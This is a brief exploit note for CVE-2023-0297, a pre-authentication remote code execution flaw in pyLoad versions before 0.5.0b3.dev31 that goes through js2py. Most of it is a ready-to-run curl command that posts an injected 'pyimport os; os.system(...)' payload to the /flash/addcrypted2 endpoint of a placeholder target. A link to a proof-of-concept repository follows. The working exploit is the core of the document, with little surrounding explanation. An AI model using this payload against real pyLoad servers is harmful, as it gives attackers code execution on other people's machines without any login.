Remote CVE-2023-0297

[Zodiac]

this is code injection vulnerability in pyLoad versions prior to 0.5.0b3.dev31 leads to pre-auth RCE by abusing js2py's functionality.

payload -

curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://<target>/flash/addcrypted2'

git link - https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad